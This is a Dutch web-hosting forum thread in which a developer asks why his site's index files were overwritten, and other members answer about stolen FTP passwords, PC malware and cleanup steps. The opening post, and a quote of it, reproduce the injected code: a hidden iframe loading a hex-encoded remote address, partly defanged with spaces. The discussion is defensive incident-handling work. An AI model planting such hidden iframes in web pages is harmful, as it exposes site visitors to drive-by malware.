Likes Likes:  0
Resultaten 1 tot 14 van de 14
  1. #1
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    geregistreerd gebruiker
    3 Berichten
    Ingeschreven
    14/06/07

    Locatie
    Haarlem

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter

    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t

    Dames en heren,

    Ik sta voor een raadsel. Onlangs is een door ons ontwikkelde website gehackt. De bestanden index.html en index.php werden overschreven met de volgende code:

    <body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><iframe src= h t t p : / / 0xcb puntje 0xdf.0x9e.0x0c/t' width='6' height='6'
    style='visibility: hidden;'></iframe>

    Ik heb al flink gezocht, maar kom nog niet tot een oorzaak. Maar ik denk wel dat het gaat om het gebruik van een specifiek FTP-programma. Nu is mijn vraag: Wie herkent dit probleem? En als het jou is overkomen, welk FTP-programma gebruikte je toen?

    Hostingpartij DreamHost heeft dit probleem gesignaleerd bij 2.500 klanten en daar werd gewerkt met WebFTP. Alleen gebruiken wij dit programma niet...

    Ik hoor graag jullie feedback.

    Groeten,


    Lenny
    Laatst gewijzigd door wonko; 29/07/09 om 07:43.

  2. #2
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    Cloud en Datacenters
    1.442 Berichten
    Ingeschreven
    11/06/05

    Locatie
    Zoetermeer

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    10 Berichten zijn liked


    Bedrijf: Technotop Internet BV
    URL: www.technotop.nl
    Registrar SIDN: nee
    ISPConnect: JA
    KvK nummer: 55349323
    Ondernemingsnummer: nvt

    Citaat Oorspronkelijk geplaatst door lenny-d Bekijk Berichten
    Dames en heren,

    Ik sta voor een raadsel. Onlangs is een door ons ontwikkelde website gehackt. De bestanden index.html en index.php werden overschreven met de volgende code:

    <body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><iframe src= h t t p : / / 0xcb puntje 0xdf.0x9e.0x0c/t' width='6' height='6'
    style='visibility: hidden;'></iframe>

    Ik heb al flink gezocht, maar kom nog niet tot een oorzaak. Maar ik denk wel dat het gaat om het gebruik van een specifiek FTP-programma. Nu is mijn vraag: Wie herkent dit probleem? En als het jou is overkomen, welk FTP-programma gebruikte je toen?

    Hostingpartij DreamHost heeft dit probleem gesignaleerd bij 2.500 klanten en daar werd gewerkt met WebFTP. Alleen gebruiken wij dit programma niet...

    Ik hoor graag jullie feedback.

    Groeten,


    Lenny
    Dit komt niet door een FTP programma, maar vaak door lekke code ergens op de server van een website. Dit zijn defaces je dient dan ook bij je hostingprovider aan te kloppen voor een mogelijke beveiliging.
    Laatst gewijzigd door wonko; 29/07/09 om 07:43.
    Technotop Internet BV - Sinds 2005 gespecialiseerd in cloud en datacentra.

  3. #3
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    Banned
    177 Berichten
    Ingeschreven
    10/03/07

    Locatie
    nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: ja
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Misschien ben niet jij, maar je provider de schuldige...

    http://www.google.com/search?ie=UTF-....0x9e.0x0c%2Ft

    DreamHost?



  4. #4
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    geregistreerd gebruiker
    3 Berichten
    Ingeschreven
    14/06/07

    Locatie
    Haarlem

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    Heren,

    Dank voor de snelle reacties.

    We hebben voor het weekend inderdaad een e-mailformulier naar de markt gecommuniceerd. Het betreft Phil-a-Form. Hier hebben we echter geen lek in kunnen vinden. Het leek de meest aannemelijke oorzaak.

    Technotop: Ik zal dit ook zeker even met mijn hoster bespreken. En geef hier hun commentaar terug. Ik wil nog niet direct de naam van de hoster noemen aangezien ik geen onnodige negatieve publiciteit voor ze wil. Tot nu toe ben ik namelijk erg tevreden over hun dienstverlening. De website wordt overigens niet gehost door Dreamhost, maar door een gerenommeerde Nederlandse provider.

    Lenny

  5. #5
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    Hugo Rodenburg
    435 Berichten
    Ingeschreven
    20/02/06

    Locatie
    Woerden

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    3 Berichten zijn liked


    Naam: Hugo Rodenburg
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Kan het probleem niet komen door slecht beveiligde andere sites op de server ? (die vervolgens andere sites op dezelfde server konden infecteren).

  6. #6
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    Web hosting diensten
    4.705 Berichten
    Ingeschreven
    09/02/04

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    10 Post(s)
    Tagged
    0 Thread(s)
    110 Berichten zijn liked


    Bedrijf: DreamHost.nl Web hosting
    Functie: Managing Director
    URL: www.dreamhost.nl
    Registrar SIDN: JA
    KvK nummer: 24269577

    Citaat Oorspronkelijk geplaatst door lenny-d Bekijk Berichten
    Hostingpartij DreamHost heeft dit probleem gesignaleerd bij 2.500 klanten en daar werd gewerkt met WebFTP. Alleen gebruiken wij dit programma niet...
    Even voor de duidelijkheid : Dat zijn we dus niet, maar waarschijnlijk onze .com concullegae...
    Dit soort problemen - zoals omschreven door TS - komen helaas wel vaker voor indien één installatie wordt gebruikt voor al haar cliënten.
    DreamHost.nl Web hosting - cPanel hosting om bij weg te dromen.

  7. #7
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    moderator
    5.444 Berichten
    Ingeschreven
    12/09/05

    Locatie
    Zuid Holland

    Post Thanks / Like
    Mentioned
    10 Post(s)
    Tagged
    0 Thread(s)
    110 Berichten zijn liked


    Naam: Stijn
    KvK nummer: 14074337

    Bij dreamhost waren laatst 2500 FTP passwords gestolen, ze hebben dit direct bekend gemaakt en alle klanten verzocht hun passwords aan te passen

  8. #8
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    geregistreerd gebruiker
    4.149 Berichten
    Ingeschreven
    09/12/05

    Locatie
    Almere

    Post Thanks / Like
    Mentioned
    10 Post(s)
    Tagged
    0 Thread(s)
    76 Berichten zijn liked


    Naam: Ramon Fincken
    Bedrijf: Managed WordPress Hosting / Codert.cloud
    Functie: CEO
    URL: www.managedwphosting.nl
    Registrar SIDN: Nee
    KvK nummer: 30262182
    TrustCloud: ramonfincken
    View ramonfincken's profile on LinkedIn

    wellicht een goed idee om alle FTP passwords / users te veranderen just in case?

    En inderdaad dat mailform eens goed na te lopen & eventuele upload scripts + directories met volledige schrijfrechten te bekijken ..

    Er stond ook niets vreemds in de access logs?
    WordPress hosting Optimalisatie webbouw debugging door WP Core developers

  9. #9
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    geregistreerd gebruiker
    3 Berichten
    Ingeschreven
    14/06/07

    Locatie
    Haarlem

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Thread Starter
    > Ramon. We hebben inderdaad de passwords gewijzigd. Nu is er geen probleem meer. Alleen wel jammer dat ik niet kan achterhalen waar het door kwam.

    > dreamhost_nl: Het was niet mijn bedoeling jullie in een kwaad daglicht te stellen. Ik bedoelde hier inderdaad jullie internationale naamgenoten!

  10. #10
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    geregistreerd gebruiker
    1 Berichten
    Ingeschreven
    19/06/07

    Locatie
    Silv

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: Nvt

    Citaat Oorspronkelijk geplaatst door lenny-d Bekijk Berichten
    > Ramon. We hebben inderdaad de passwords gewijzigd. Nu is er geen probleem meer. Alleen wel jammer dat ik niet kan achterhalen waar het door kwam.

    > dreamhost_nl: Het was niet mijn bedoeling jullie in een kwaad daglicht te stellen. Ik bedoelde hier inderdaad jullie internationale naamgenoten!
    Wij hebben dit ook ondervonden. Onze provider geeft aan dat hij dit al eens eerder heeft gezien. Destijds was een virus die het wachtwoord en gebruikernaam onderschepte de oorzaak. Het enige dat tot nu toe bij ons heeft geholpen is je pc op virussen en spyware te checken en geen wachtwoorden in je ftp programma te saven en inderdaad direct de wachtwoorden van ftp en overige zaken aan te passen.
    Let ook op het uiterlijk van je site. Deze wijzigt veelal door de toevoeging van de iframes. Vertrouw je het niet, vraag dan eerst een bronbestand van je website op en check deze op iframes en de proxycode 8080:

  11. #11
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    geregistreerd gebruiker
    1.354 Berichten
    Ingeschreven
    17/06/03

    Locatie
    Delft

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    24 Berichten zijn liked


    Naam: Michiel Thalen
    KvK nummer: 02084745

    Knap staaltje reanimatie..
    Makkelijk een Enquete of HR/Klantenonderzoek opstellen? https://sur-v.com

  12. #12
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    Server Freak
    3.640 Berichten
    Ingeschreven
    19/05/06

    Locatie
    Assen

    Post Thanks / Like
    Mentioned
    16 Post(s)
    Tagged
    0 Thread(s)
    215 Berichten zijn liked


    Naam: Sinterklaas

    Door die reanimatie sloeg mijn virusscanner op hol. Die link staat ondanks de spaties op een blacklist. Nu zonder virusscanner kan ik WHT tenminste weer bezoeken...

  13. #13
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    moderator
    4.784 Berichten
    Ingeschreven
    04/11/05

    Locatie
    Gent

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    12 Berichten zijn liked


    Registrar SIDN: ja
    KvK nummer: nvt
    Ondernemingsnummer: 0475284162

    Ondanks het feit dat het een topic uit de oudheid is, toch nog even dit: recent hebben wij ook bij een klant gezien dat een virus/spyware op een windows-pc blijkbaar usernames/paswoorden ging verzamelen, en toen opeens overal iframes ging inzetten. Het blijft dus spelen, en is de wereld nog niet uit...

  14. #14
    Website hack 0xcb puntje 0xdf.0x9e.0x0c/t
    BoFH
    1.034 Berichten
    Ingeschreven
    24/11/03

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Bedrijf: Vevida B.V
    Functie: Systeembeheerder
    Registrar SIDN: ja
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Het is de wereld nog lang niet uit, helaas. Zolang virussen en andere malware in staat blijven om FTP-wachtwoorden uit cache, bestanden, e.d. te vissen én het voor skriptkiddo's en spammers lucratief blijft, zal dit nog wel even aanhouden.

    Deze week nog maar 3 websites ontoegankelijk gemaakt ("rustig weekje") (*). Wij adviseren klanten dan om:
    1) de website te verwijderen
    2) de PC te scannen op malware, met een nieuw geinstalleerde virusscanner (AVG, ClamAV, MRT of whatever)
    3) na opschoning van de PC, de FTP wachtwoorden te veranderen naar een wachtwoord van het liefst 12-14 karakters, maar minimaal 8.

    Is hieraan voldaan wordt een website weer toegankelijk gemaakt.

    (*) de trend sinds deze week is om weer mass mailing scripts te uploaden. Een paar maanden lang is dit "uit de mode" geweest en werden er enkel iframes en payloads aan index bestanden toegevoegd. Maar nu staan de verschillende PHP scripts er weer. Vaak al dagen voor het spammen geupload.
    --
    VEVIDA Services, http://www.vevida.com

Labels voor dit Bericht

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2021 Webhostingtalk.nl.
Web Statistics